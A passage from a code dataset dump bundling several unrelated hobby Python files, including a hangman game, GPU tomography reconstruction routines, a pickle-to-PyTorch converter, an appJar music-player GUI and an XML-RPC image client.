\",\r\n \"| /|\\ \",\r\n \"| / \\ \",\r\n \"| \",\r\n ]\r\n rletters = list(word)\r\n board = [\"_\"]*len(word)\r\n win = False\r\n print(\"Welcom to the penalty!\")\r\n while wrong < len(stages) - 1:\r\n print(\"\\n\")\r\n msg = \"Enter a letter: \"\r\n guess = input(msg)\r\n if guess in rletters:\r\n cind = rletters.index(guess)\r\n board[cind] = guess\r\n rletters[cind] = \"$\"\r\n else:\r\n wrong += 1\r\n print((\" \".join(board)))\r\n e = wrong + 1\r\n print(\"\\n\".join(stages[0: e]))\r\n if \"_\" not in board:\r\n print(\"You have won! It was made the word: \")\r\n print(\" \".join(board))\r\n win = True\r\n break\r\n if not win:\r\n #print(\"\\n\".join(stages[0: e]))\r\n print(\"You lose! 
It is made a word: {}.\".format(word))\r\n\r\nhangman(\"cat\")\r\n","repo_name":"SergeiPetroff/hangman","sub_path":"Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29164983849","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport urllib3\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nreplace_map = {'_': '\\\\_',\n '*': '\\\\*',\n '[': '\\\\[',\n ']': '\\\\]',\n '(': '\\\\(',\n ')': '\\\\)',\n '~': '\\\\~',\n '`': '\\\\`',\n '>': '\\\\>',\n '#': '\\\\#',\n '+': '\\\\+',\n '-': '\\\\-',\n '=': '\\\\=',\n '|': '\\\\|',\n '{': '\\\\{',\n '}': '\\\\}',\n '.': '\\\\.',\n '!': '\\\\!'\n }\n\n\ndef create_session(connections=20, retries=5, backoff_factor=2,\n status_forcelist=None, disable_warnings=False) -> requests.Session:\n _session = requests.Session()\n if disable_warnings is True:\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n urllib3.disable_warnings()\n status_forcelist = status_forcelist or (429, 500, 502, 503, 504)\n retry = Retry(total=retries, backoff_factor=backoff_factor, status_forcelist=status_forcelist)\n adapters = HTTPAdapter(pool_connections=connections, max_retries=retry)\n _session.mount('https://', adapters)\n return _session\n\n\ndef replace(string: str) -> str:\n \"\"\"\n Replace parts of a string based on a dictionary.\n\n This function takes a string a dictionary of\n replacement mappings. For example, if I supplied\n the string \"Hello world.\", and the mappings\n {\"H\": \"J\", \".\": \"!\"}, it would return \"Jello world!\".\n\n ref: https://core.telegram.org/bots/api#formatting-options\n\n :param string: string to replace characters in.\n \"\"\"\n for character, replacement in replace_map.items():\n string = string.replace(character, replacement)\n return string\n\n\ndef string_to_int(string: str) -> int:\n def is_digit(string: str) -> bool:\n string = string.replace('.', '', 1)\n return string.isdigit()\n\n def remove_dot(string) -> str:\n return string.replace('.', '', 1)\n\n string = string.strip().lower().replace(',', '')\n try:\n result = int(float(string))\n except ValueError:\n if string.endswith('k') and is_digit(string[:-1]):\n result = int(float(string[:-1]) * 1000)\n elif string.endswith('m') and is_digit(string[:-1]):\n result = int(float(string[:-1]) * 1000000)\n elif string.endswith('b') and is_digit(string[:-1]):\n result = int(float(string[:-1]) * 1000000000)\n else:\n result = 0\n\n return result\n\n\nsession = create_session()\n","repo_name":"stunnel/stacker-news-top","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8940191885","text":"def smallorlarge():\n list = []\n while True:\n try:\n number = input(\"Enter a number:\")\n if number == 'done':\n break\n converted = int(number)\n list.append(converted)\n maximum = max(list)\n minimum = min(list)\n except:\n print(\"input is not a valid number\")\n \n print(\"Maximum is\",maximum)\n print(\"Minimum 
is\",minimum)\n\nsmallorlarge()","repo_name":"paulde1/py4e","sub_path":"class1/largeorsmall.py","file_name":"largeorsmall.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18261822131","text":"import tomopy\nimport argparse\nimport numpy as np\nimport afnumpy as afnp\nimport arrayfire as af\nfrom gnufft import tvd_update,add_hessian\n\nfrom XT_ForwardModel import forward_project, init_nufft_params, back_project\n\ndef gpuGridrec(tomo,angles,center,input_params):\n \"\"\"\n Gridrec reconstruction using GPU based gridding\n Inputs: tomo : 3D numpy sinogram array with dimensions same as tomopy\n angles : Array of angles in radians\n center : Floating point center of rotation\n input_params : A dictionary with the keys\n 'gpu_device' : Device id of the gpu (For a 4 GPU cluster ; 0-3)\n 'oversamp_factor': A factor by which to pad the image/data for FFT\n 'fbp_filter_param' : A number between 0-1 for setting the filter cut-off for FBP\n \"\"\"\n\n print('Starting GPU NUFFT recon')\n #allocate space for final answer \n af.set_device(input_params['gpu_device']) #Set the device number for gpu based code\n #Change tomopy format\n new_tomo=np.transpose(tomo,(1,2,0)) #slice, columns, angles\n im_size = new_tomo.shape[1]\n num_slice = new_tomo.shape[0]\n num_angles=new_tomo.shape[2]\n pad_size=np.int16(im_size*input_params['oversamp_factor'])\n# nufft_scaling = (np.pi/pad_size)**2\n #Initialize structures for NUFFT\n sino={}\n geom={}\n sino['Ns'] = pad_size#Sinogram size after padding\n sino['Ns_orig'] = im_size #size of original sinogram\n sino['center'] = center + (sino['Ns']/2 - sino['Ns_orig']/2) #for padded sinogram\n sino['angles'] = angles\n sino['filter'] = input_params['fbp_filter_param'] #Paramter to control strength of FBP filter normalized to [0,1]\n\n #Initialize NUFFT parameters\n nufft_params = init_nufft_params(sino,geom)\n rec_nufft = afnp.zeros((num_slice/2,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)\n Ax = afnp.zeros((sino['Ns'],num_angles),dtype=afnp.complex64)\n pad_idx = slice(sino['Ns']/2-sino['Ns_orig']/2,sino['Ns']/2+sino['Ns_orig']/2)\n rec_nufft_final=np.zeros((num_slice,sino['Ns_orig'],sino['Ns_orig']),dtype=np.float32)\n \n #Move all data to GPU\n slice_1=slice(0,num_slice,2)\n slice_2=slice(1,num_slice,2)\n gdata=afnp.array(new_tomo[slice_1]+1j*new_tomo[slice_2],dtype=afnp.complex64)\n x_recon = afnp.zeros((sino['Ns'],sino['Ns']),dtype=afnp.complex64)\n #loop over all slices\n for i in range(0,num_slice/2):\n Ax[pad_idx,:]=gdata[i]\n #filtered back-projection \n rec_nufft[i] = (back_project(Ax,nufft_params))[pad_idx,pad_idx]\n\n\n #Move to CPU\n #Rescale result to match tomopy\n rec_nufft=np.array(rec_nufft,dtype=np.complex64) #*nufft_scaling\n rec_nufft_final[slice_1]=np.array(rec_nufft.real,dtype=np.float32)\n rec_nufft_final[slice_2]=np.array(rec_nufft.imag,dtype=np.float32)\n return rec_nufft_final\n\n\ndef gpuSIRT(tomo,angles,center,input_params):\n \"\"\"\n SIRT reconstruction using GPU based gridding operators\n Inputs: tomo : 3D numpy sinogram array with dimensions same as tomopy\n angles : Array of angles in radians\n center : Floating point center of rotation\n input_params : A dictionary with the keys\n 'gpu_device' : Device id of the gpu (For a 4 GPU cluster ; 0-3)\n 'oversamp_factor': A factor by which to pad the image/data for FFT\n 'num_iter' : Number of SIRT iterations\n \"\"\"\n print('Starting GPU SIRT recon')\n #allocate space for final 
answer \n af.set_device(input_params['gpu_device']) #Set the device number for gpu based code\n #Change tomopy format\n new_tomo=np.transpose(tomo,(1,2,0)) #slice, columns, angles\n im_size = new_tomo.shape[1]\n num_slice = new_tomo.shape[0]\n num_angles=new_tomo.shape[2]\n pad_size=np.int16(im_size*input_params['oversamp_factor'])\n# nufft_scaling = (np.pi/pad_size)**2\n num_iter = input_params['num_iter']\n #Initialize structures for NUFFT\n sino={}\n geom={}\n sino['Ns'] = pad_size#Sinogram size after padding\n sino['Ns_orig'] = im_size #size of original sinogram\n sino['center'] = center + (sino['Ns']/2 - sino['Ns_orig']/2) #for padded sinogram\n sino['angles'] = angles\n \n #Initialize NUFFT parameters\n nufft_params = init_nufft_params(sino,geom)\n temp_y = afnp.zeros((sino['Ns'],num_angles),dtype=afnp.complex64)\n temp_x = afnp.zeros((sino['Ns'],sino['Ns']),dtype=afnp.complex64)\n x_recon = afnp.zeros((num_slice/2,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64) \n pad_idx = slice(sino['Ns']/2-sino['Ns_orig']/2,sino['Ns']/2+sino['Ns_orig']/2)\n\n #allocate output array\n rec_sirt_final=np.zeros((num_slice,sino['Ns_orig'],sino['Ns_orig']),dtype=np.float32)\n\n #Pre-compute diagonal scaling matrices ; one the same size as the image and the other the same as data\n #initialize an image of all ones\n x_ones= afnp.ones((sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)\n temp_x[pad_idx,pad_idx]=x_ones\n temp_proj=forward_project(temp_x,nufft_params) #*(sino['Ns']*afnp.pi/2)\n R = 1/afnp.abs(temp_proj)\n R[afnp.isnan(R)]=0\n R[afnp.isinf(R)]=0\n R=afnp.array(R,dtype=afnp.complex64)\n \n #Initialize a sinogram of all ones\n y_ones=afnp.ones((sino['Ns_orig'],num_angles),dtype=afnp.complex64)\n temp_y[pad_idx]=y_ones\n temp_backproj=back_project(temp_y,nufft_params) #*nufft_scaling/2\n C = 1/(afnp.abs(temp_backproj))\n C[afnp.isnan(C)]=0\n C[afnp.isinf(C)]=0\n C=afnp.array(C,dtype=afnp.complex64)\n \n #Move all data to GPU\n slice_1=slice(0,num_slice,2)\n slice_2=slice(1,num_slice,2)\n gdata=afnp.array(new_tomo[slice_1]+1j*new_tomo[slice_2],dtype=afnp.complex64)\n \n #loop over all slices\n for i in range(num_slice/2):\n for iter_num in range(num_iter):\n #filtered back-projection\n temp_x[pad_idx,pad_idx]=x_recon[i]\n Ax = forward_project(temp_x,nufft_params)\n temp_y[pad_idx]=gdata[i]\n x_recon[i] = x_recon[i]+(C*back_project(R*(temp_y-Ax),nufft_params))[pad_idx,pad_idx] #nufft_scaling\n\n #Move to CPU\n #Rescale result to match tomopy\n rec_sirt=np.array(x_recon,dtype=np.complex64)\n rec_sirt_final[slice_1]=np.array(rec_sirt.real,dtype=np.float32)\n rec_sirt_final[slice_2]=np.array(rec_sirt.imag,dtype=np.float32)\n return rec_sirt_final\n\n\ndef gpuMBIR(tomo,angles,center,input_params):\n \"\"\"\n MBIR reconstruction using GPU based gridding operators\n Inputs: tomo : 3D numpy sinogram array with dimensions same as tomopy\n angles : Array of angles in radians\n center : Floating point center of rotation\n input_params : A dictionary with the keys\n 'gpu_device' : Device id of the gpu (For a 4 GPU cluster ; 0-3)\n 'oversamp_factor': A factor by which to pad the image/data for FFT\n 'num_iter' : Max number of MBIR iterations\n 'smoothness' : Regularization constant\n 'p': MRF shape param\n \"\"\"\n print('Starting GPU MBIR recon')\n #allocate space for final answer \n af.set_device(input_params['gpu_device']) #Set the device number for gpu based code\n #Change tomopy format\n new_tomo=np.transpose(tomo,(1,2,0)) #slice, columns, angles\n im_size = new_tomo.shape[1]\n num_slice = 
new_tomo.shape[0]\n num_angles=new_tomo.shape[2]\n pad_size=np.int16(im_size*input_params['oversamp_factor'])\n# nufft_scaling = (np.pi/pad_size)**2\n num_iter = input_params['num_iter']\n mrf_sigma = input_params['smoothness']\n mrf_p = input_params['p']\n print('MRF params p=%f sigma=%f' %(mrf_p,mrf_sigma))\n #Initialize structures for NUFFT\n sino={}\n geom={}\n sino['Ns'] = pad_size#Sinogram size after padding\n sino['Ns_orig'] = im_size #size of original sinogram\n sino['center'] = center + (sino['Ns']/2 - sino['Ns_orig']/2) #for padded sinogram\n sino['angles'] = angles\n \n #Initialize NUFFT parameters\n print('Initialize NUFFT params')\n nufft_params = init_nufft_params(sino,geom)\n\n temp_y = afnp.zeros((sino['Ns'],num_angles),dtype=afnp.complex64)\n temp_x = afnp.zeros((sino['Ns'],sino['Ns']),dtype=afnp.complex64)\n x_recon = afnp.zeros((num_slice/2,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)\n \n pad_idx = slice(sino['Ns']/2-sino['Ns_orig']/2,sino['Ns']/2+sino['Ns_orig']/2)\n\n #allocate output array\n rec_mbir_final=np.zeros((num_slice,sino['Ns_orig'],sino['Ns_orig']),dtype=np.float32)\n \n #Move all data to GPU\n print('Moving data to GPU')\n slice_1=slice(0,num_slice,2)\n slice_2=slice(1,num_slice,2)\n gdata=afnp.array(new_tomo[slice_1]+1j*new_tomo[slice_2],dtype=afnp.complex64)\n gradient = afnp.zeros((num_slice/2,sino['Ns_orig'],sino['Ns_orig']), dtype=afnp.complex64)#temp array to store the derivative of cost func\n z_recon = afnp.zeros((num_slice/2,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)#Nesterov method variables\n t_nes = 1\n \n #Compute Lipschitz of gradient\n print('Computing Lipschitz of gradient')\n x_ones= afnp.ones((1,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)\n temp_x[pad_idx,pad_idx]=x_ones[0]\n temp_proj=forward_project(temp_x,nufft_params)\n temp_backproj=(back_project(temp_proj,nufft_params))[pad_idx,pad_idx]\n print('Adding Hessian of regularizer')\n temp_backproj2=afnp.zeros((1,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)\n temp_backproj2[0]=temp_backproj\n add_hessian(mrf_sigma,x_ones, temp_backproj2)\n L = np.max([temp_backproj2.real.max(),temp_backproj2.imag.max()])\n print('Lipschitz constant = %f' %(L))\n del x_ones,temp_proj,temp_backproj,temp_backproj2\n\n #loop over all slices\n for iter_num in range(num_iter):\n print('Iteration %d of %d'%(iter_num,num_iter))\n #Derivative of the data fitting term\n for i in range(num_slice/2):\n temp_x[pad_idx,pad_idx]=x_recon[i]\n Ax = forward_project(temp_x,nufft_params)\n temp_y[pad_idx]=gdata[i]\n gradient[i] =(back_project((Ax-temp_y),nufft_params))[pad_idx,pad_idx] #nufft_scaling\n #Derivative of regularization term\n tvd_update(mrf_p,mrf_sigma,x_recon, gradient) \n #x_recon-=gradient/L\n x_recon,z_recon,t_nes=nesterovOGM2update(x_recon,z_recon,t_nes,gradient,L)\n \n #Move to CPU\n #Rescale result to match tomopy\n rec_mbir=np.array(x_recon,dtype=np.complex64)\n rec_mbir_final[slice_1]=np.array(rec_mbir.real,dtype=np.float32)\n rec_mbir_final[slice_2]=np.array(rec_mbir.imag,dtype=np.float32)\n return rec_mbir_final\n\ndef nesterovOGM1update(x,z,t,grad,L):\n#L = Lipshcitz constant\n tNew = 0.5*(1+np.sqrt(1+4*(t**2)))\n zNew = x - grad/L\n xNew = zNew + ((t-1)/tNew)*(zNew-z)\n return xNew,zNew,tNew\n\ndef nesterovOGM2update(x,z,t,grad,L):\n#L = Lipshcitz constant\n zNew = x - grad/L\n tNew = 0.5*(1+np.sqrt(1+4*(t**2)))\n xNew =zNew + ((t -1)/tNew)*(zNew-z) + (t/tNew)*(zNew-x)\n return xNew,zNew,tNew\n 
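# Editor's note (added comment, not in the original file): both helpers above implement the momentum recursion\n# tNew = (1 + sqrt(1 + 4*t^2)) / 2 with the gradient step zNew = x - grad/L; OGM2 adds the extra (t/tNew)*(zNew - x)\n# correction term. L is the Lipschitz constant of the gradient, estimated numerically in gpuMBIR above.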
\n","repo_name":"ronpandolfi/Xi-cam","sub_path":"xicam/plugins/tomography/tomocam/tomoCam.py","file_name":"tomoCam.py","file_ext":"py","file_size_in_byte":11633,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"8891347013","text":"import pickle\nimport torch\nfrom StyleGANDiscriminator import Discriminator_pt as D\n\ndef parse_args():\n parser = argparase.ArgumentParser()\n parser.add_argument('pkl_params_path', type=str, help='Path to the pkl-param.')\n parser.add_argument('output_model_name', type=str, help='Name of the params of pytorch-model.')\n return parser.parse_args()\n\ndef main():\n args = parse_args()\n discriminator = D(0, 256, 3)\n\n with open(args.pkl, 'rb') as f:\n d_params = pickle.load(f)\n print(\"Loading completed.\")\n\n param_name = []\n for key in d_params.keys():\n param_name.append(key)\n param_name = param_name[1:]\n\n torch_param = discriminator.state_dict()\n param_name_pt = []\n for key in torch_param.keys():\n if 'resample' not in key:\n param_name_pt.append(key)\n\n print('Extraction of names of params completed.')\n\n for i in range(len(param_name)):\n param = d_param[param_name[i]]\n torch_param[param_name_pt[i]].data = torch.tensor(param)\n\n discriminator.load_state_dict(torch_param)\n\n torch.save(discriminator.state_dict(), args.output_model_name)\n print('Saved completely.')\n\nif __name__ == '__main__':\n main()\n","repo_name":"watarumacaron/pkl2pt","sub_path":"convert_param.py","file_name":"convert_param.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27017823163","text":"import os\nimport ntpath\nimport sys\nimport threading\nimport time\nfrom appJar import gui\nimport DBhandling as db\nimport mediaHandling as media\nimport playlistLogic as pl\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\napp = gui('main menu', '600x500', showIcon=True)\nmedia.initialize()\n# media.queuePlaylist(db.getPlaylist('test'))# testing\n\n\napp.setIcon(os.path.join(script_dir, 'icon.ico'))\napp.setIcon('icon.ico')\n\ndef stopFunction():\n # stop the infinite loop in media\n media.stopLoop()\n return True\n\napp.setStopFunction(stopFunction)\n\ndef temporaryWindow(title, body):\n '''\n produces and opens destructible subwindow.\n - title is the title of the subwindow\n - body is a function where the contents of the window are specified (adding\n buttons, etc.)\n '''\n global isDestroying\n # prevents stopFunction - destroySubWindow infinite recursion\n isDestroying = False\n def destroy():\n global isDestroying\n if not isDestroying:\n isDestroying = True\n app.destroySubWindow(title)\n isDestroying = False\n return True\n app.startSubWindow(title, modal=True, transient=True)\n app.setStopFunction(destroy)\n body()\n app.stopSubWindow()\n app.showSubWindow(title)\n\n\ndef addSong():\n path = app.openBox('select a song to add', fileTypes=[('Audio', '*.mp3')])\n if path:\n name = ntpath.basename(path)\n app.infoBox('test', path+'\\n'+name)\n bangericity = 0.0\n while True:\n bangericity = app.floatBox('bangericity input', 'enter a\\\n bangericity from 0 to 100')\n if bangericity is None:\n # user cancelled\n break\n # validate bangericity\n if 0 <= bangericity and bangericity <= 100:\n break\n app.errorBox('invalid bangericity box', 'Error: bangericity must be\\\n between 0 and 100')\n if bangericity is not None:\n try:\n db.addSong(path, name, bangericity)\n except FileExistsError:\n 
app.errorBox('duplicate song error box',\n 'Error: A song with this name already exists. The song will\\\n not be added.')\n updateSongTable()\n\n\nrealSlide = True\ndef seek(slider):\n '''slider callback'''\n global realSlide\n if slider == 'slider' and realSlide:\n value = app.getScale('slider') / 100\n duration = media.getDuration()\n if duration is not None:\n time = media.getDuration() * value\n media.seek(time)\n media.play()\n\ndef updateSlider():\n '''sets slider according to song progress'''\n global realSlide\n time = media.getTime()\n if time is not None:\n duration = media.getDuration()\n ratio = time / duration\n realSlide = False\n app.setScale('slider', ratio*100)\n realSlide = True\n\ndef songAction(rowNum):\n songOptionsWindow(app.getTableRow('song table', rowNum)[0])\n\ndef songOptionsWindow(song):\n song = db.getSong(song)\n title = song.name+' options'\n def optionsContent():\n def press(button):\n if button == 'play now':\n media.forcePlay(song)\n elif button == 'add to queue':\n media.queue(song)\n elif button == 'edit tags':\n # new window for editing tags\n def body1():\n allTags = db.getAllTags()\n songTags = song.tags\n boolDict = {}\n for tag in allTags:\n if tag in songTags:\n boolDict[tag.name] = True\n else:\n boolDict[tag.name] = False\n app.properties('song tag selection', value=boolDict)\n def editTagPress(button):\n if button == 'submit':\n result = app.getProperties('song tag selection')\n newTags = []\n for tag in result:\n if result[tag] is True:\n newTags.append(db.getTag(tag))\n db.setSongTags(song, newTags)\n app.destroySubWindow('edit tags window')\n app.addButton('submit', editTagPress)\n temporaryWindow('edit tags window', body1)\n elif button == 'change bangericity':\n bangericity = 0.0\n while True:\n bangericity = app.floatBox('bangericity input', 'enter a\\\n bangericity from 0 to 100')\n if bangericity is None:\n # user cancelled\n break\n # validate bangericity\n if 0 <= bangericity and bangericity <= 100:\n break\n app.errorBox('invalid bangericity box', 'Error: bangericity\\\n must be between 0 and 100')\n if bangericity is not None:\n db.changeBangericity(song, bangericity)\n updateSongTable()\n elif button == 'remove from library':\n confirmation = app.yesNoBox('remove song?', 'Are you sure you\\\n want to remove this song?')\n if confirmation is True:\n db.removeSong(song)\n updateSongTable()\n app.destroySubWindow(title)\n\n app.addButtons(['play now', 'add to queue', 'edit tags',\n 'change bangericity', 'remove from library'], press\n )\n temporaryWindow(title, optionsContent)\n\ndef playlistForm(playlist=None):\n '''can be used for creation and editing.\n if playlist is None, it goes to creation mode\n '''\n if playlist == 'newRow':\n playlist = None\n title = ''\n if playlist is not None:\n playlist = db.getPlaylist(playlist)\n title = 'edit playlist '+playlist.name\n else:\n title = 'create playlist'\n\n def formContents():\n allTags = db.getAllTags()\n includedTags = []\n excludedTags = []\n if playlist is not None:\n includedTags = playlist.includedTags\n excludedTags = playlist.excludedTags\n includedTagDict = {}\n excludedTagDict = {}\n # both going to be {tagname => boolean, ...}\n for tag in allTags:\n includedTagDict[tag.name] = tag in includedTags\n excludedTagDict[tag.name] = tag in excludedTags\n if playlist is None:\n app.addLabel('playlist name:')\n app.entry('name')\n\n app.properties('included tags', includedTagDict)\n app.properties('excluded tags', excludedTagDict)\n app.addLabel('minimum and maximum 
bangericity:')\n app.addNumericEntry('minimum bangericity')\n app.addNumericEntry('maximum bangericity')\n min = 0\n max = 100\n if playlist is not None:\n min = playlist.minBangericity\n max = playlist.maxBangericity\n app.setEntry('minimum bangericity', min)\n app.setEntry('maximum bangericity', max)\n\n app.addCheckBox('use AND logic on includes')\n ticked = True\n if playlist is not None:\n ticked = playlist.andLogic\n app.setCheckBox('use AND logic on includes', ticked=ticked)\n\n\n def submit(button):\n if button == 'submit':\n # bangericity\n minBangericity = float(app.getEntry('minimum bangericity'))\n maxBangericity = float(app.getEntry('maximum bangericity'))\n # validate bangericities\n if not minBangericity < maxBangericity:\n app.errorBox('invalid bangericities', 'minimum bangericity\\\n must be less than maximum bangericity')\n return None\n # include logic\n andLogic = app.getCheckBox('use AND logic on includes')\n # tags\n newIncludedTags = []\n newExcludedTags = []\n includedTagDict = app.getProperties('included tags')\n excludedTagDict = app.getProperties('excluded tags')\n ##### left off here investigating bug where you can't edit then add\n # also label entries\n # figure out what the new tags will be\n for tag in includedTagDict:\n if includedTagDict[tag] is True:\n newIncludedTags.append(db.getTag(tag))\n if excludedTagDict[tag] is True:\n newExcludedTags.append(db.getTag(tag))\n # name\n if playlist is None:\n name = app.getEntry('name')\n # validate name\n if name == '':\n app.errorBox('invalid name', 'playlist must have a name')\n return None\n existingPlaylistNames = [\n playlist.name for playlist in db.getAllPlaylists()\n ]\n if name in existingPlaylistNames:\n app.errorBox('duplicate name', 'a playlist with that\\\n name already exists')\n return None\n # create playlist\n db.addPlaylist(name, newIncludedTags, newExcludedTags,\n minBangericity, maxBangericity, andLogic\n )\n showPlaylistSongs(name)\n updatePlaylistTable()\n app.destroySubWindow(title)\n else:\n # edit playlist\n playlist.includedTags = newIncludedTags\n playlist.excludedTags = newExcludedTags\n playlist.minBangericity = minBangericity\n playlist.maxBangericity = maxBangericity\n playlist.andLogic = andLogic\n showPlaylistSongs(playlist)\n updatePlaylistTable()\n app.destroySubWindow(title)\n\n app.addButton('submit', submit)\n\n temporaryWindow(title, formContents)\ndef showPlaylistSongs(playlist):\n playlist = db.getPlaylist(playlist)\n songs = list(pl.buildPlaylist(playlist))\n songNames = [song.name for song in songs]\n app.infoBox(playlist.name+' songs', '\\n'.join(songNames))\ndef playlistAction(rowNum):\n playlistOptionsWindow(app.getTableRow('playlist table', rowNum)[0])\n\ndef playlistOptionsWindow(playlist):\n playlist = db.getPlaylist(playlist)\n title = playlist.name+' playlist options window'\n\n def optionsContent():\n def press(button):\n if button == 'play now':\n media.forcePlayPlaylist(playlist)\n elif button == 'add to queue':\n media.queuePlaylist(playlist)\n elif button == 'view songs':\n showPlaylistSongs(playlist)\n elif button == 'edit':\n playlistForm(playlist)\n # remember to edit bangericity and includeLogic too\n elif button == 'remove':\n confirmation = app.yesNoBox('remove playlist?',\n 'Are you sure you want to remove this playlist?')\n if confirmation is True:\n db.removePlaylist(playlist)\n updatePlaylistTable()\n app.destroySubWindow(title)\n app.addButtons(['play now', 'add to queue', 'view songs', 'edit', 'remove'],\n press)\n # maybe don't do make into a tag\n 
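# Editor's note (added comment, not in the original file): temporaryWindow() builds this modal from optionsContent and\n # destroys it when closed, so each click constructs a fresh options window rather than reusing a cached one.\n 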
temporaryWindow(title, optionsContent)\n\ndef tagAction(rowNum):\n tagOptionsWindow(app.getTableRow('tag table', rowNum)[0])\n\ndef tagOptionsWindow(tag):\n tag = db.getTag(tag)\n title = tag.name + ' tag options window'\n def press(button):\n if button == 'view songs':\n songs = tag.songs\n songNames = [song.name for song in songs]\n app.infoBox('songs', '\\n'.join(songNames))\n elif button == 'remove':\n if app.yesNoBox('confirmation', 'are you sure you want to remove this tag?'):\n db.removeTag(tag)\n updateTagTable()\n app.destroySubWindow(title)\n def optionsContent():\n app.addButtons(['view songs', 'remove'], press)\n temporaryWindow(title, optionsContent)\n\ndef loop():\n global updateSlider\n while threading.main_thread().is_alive():\n updateSlider()\n updateSongLabel()\n time.sleep(1)\n\ndef addTag():\n name = app.stringBox('create a tag', 'tag name:')\n db.addTag(name)\n updateTagTable()\n\nwith app.tabbedFrame('tabs'):\n with app.tab('songs'):\n songs = db.getAllSongs()\n tableArr = [[song.name, song.bangericity] for song in songs]\n tableArr.sort()\n app.addTable('song table', [['Name','Bangericity']]+tableArr, colspan=3, addRow=addSong, showMenu=True, action=songAction)\n with app.tab('playlists'):\n playlists = db.getAllPlaylists()\n tableArr = [[playlist.name] for playlist in playlists]\n tableArr.sort()\n app.addTable('playlist table', [['Name']]+tableArr, colspan=3, showMenu=True, action=playlistAction, addRow=playlistForm)\n with app.tab('tags'):\n tags = db.getAllTags()\n tableArr = [[tag.name] for tag in tags]\n tableArr.sort()\n app.addTable('tag table', [['Name']]+tableArr, colspan=3, showMenu=True, action=tagAction, addRow=addTag)\n\ndef updateSongTable():\n songs = db.getAllSongs()\n tableArr = [[song.name, song.bangericity] for song in songs]\n tableArr.sort()\n app.replaceAllTableRows('song table', tableArr)\n\ndef updatePlaylistTable():\n playlists = db.getAllPlaylists()\n tableArr = [[playlist.name] for playlist in playlists]\n tableArr.sort()\n app.replaceAllTableRows('playlist table', tableArr)\n\ndef updateTagTable():\n tags = db.getAllTags()\n tableArr = [[tag.name] for tag in tags]\n tableArr.sort()\n app.replaceAllTableRows('tag table', tableArr)\n\n\ndef mediaPress(button):\n if button == 'previous':\n media.previousSong()\n elif button == 'pause':\n media.pause()\n elif button == 'play':\n media.play()\n elif button == 'next':\n media.nextSong()\n\n\ndef updateSongLabel():\n if media.getPlaying():\n app.setLabel('currently playing label', media.getPlaying().name)\n\n\nwith app.frame('bottom', row=3):\n app.addLabel('currently playing label', '')\n app.addScale('slider')\n app.setScaleIncrement('slider', 0)\n t = threading.Thread(target=loop)\n t.start()\n app.setScaleChangeFunction('slider', seek)\n app.addButtons(['previous', 'pause', 'play', 'next'], mediaPress)\n app.setButtonImage('play', os.path.join(app.icon_path, 'md-play.png'))\n app.setButtonImage('pause', os.path.join(app.icon_path, 'md-pause.png'))\n app.setButtonImage('next', os.path.join(app.icon_path, 'md-next.png'))\n app.setButtonImage('previous', os.path.join(app.icon_path, 'md-previous.png'))\n\n\napp.go()\n","repo_name":"quasarbright/quasarbright.github.io","sub_path":"python/mp3/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":15189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19449903592","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'blog'\n\nurlpatterns = [\n path('', views.all_blogs, name='all_blogs'),\n path('<int:blog_id>/', views.detail, name='detail'),\n # if someone puts an int in the URL, that int is passed as blog_id to views.detail\n]\n","repo_name":"novotj88/django3-personal-portfolio","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31375903004","text":"#!/usr/bin/python\n# coding=utf8\n\nimport xmlrpc.client\nfrom xmlrpc.client import ServerProxy\n\n__author__ = 'Jam'\n__date__ = '2019/6/26 18:07'\n\nif __name__ == '__main__':\n server = ServerProxy(\"http://localhost:8888\", allow_none=True)\n print (server.get_string(\"cloudox\"))\n print (server.add(8, 8))\n\n # Upload a file\n put_handle = open(\"./tmp/pd_figure_0.png\", 'rb')\n server.image_put(xmlrpc.client.Binary(put_handle.read()))\n put_handle.close()\n\n # Download a file\n get_handle = open(\"./tmp/test.png\", 'wb')\n get_handle.write(server.image_get().data)\n get_handle.close()\n","repo_name":"ls1248659692/python_guide","sub_path":"data_analysis_tutorial/rpc_client.py","file_name":"rpc_client.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"48"} +{"seq_id":"31012586145","text":"import networkx as nx\nimport graphviz as gv\nimport pydot as pd\nimport platform\n\n# FIXME: Make this more intelligent\nif platform.system() == 'Windows':\n import os\n os.environ[\"PATH\"] += os.pathsep + 'C:/Program Files/Graphviz/bin/'\n\nclass CircuitGraph:\n \n # Prefixes for the circuit elements\n _element_prefixes = [\n \"C\", # Capacitor\n \"L\", # Inductor\n \"I\", # Josephson junction\n \"V\", # Phase-slip nanowire\n \"M\" # Mutual inductance\n ]\n \n _resonator_prefixes = [\n \"f\", # Resonant frequency\n 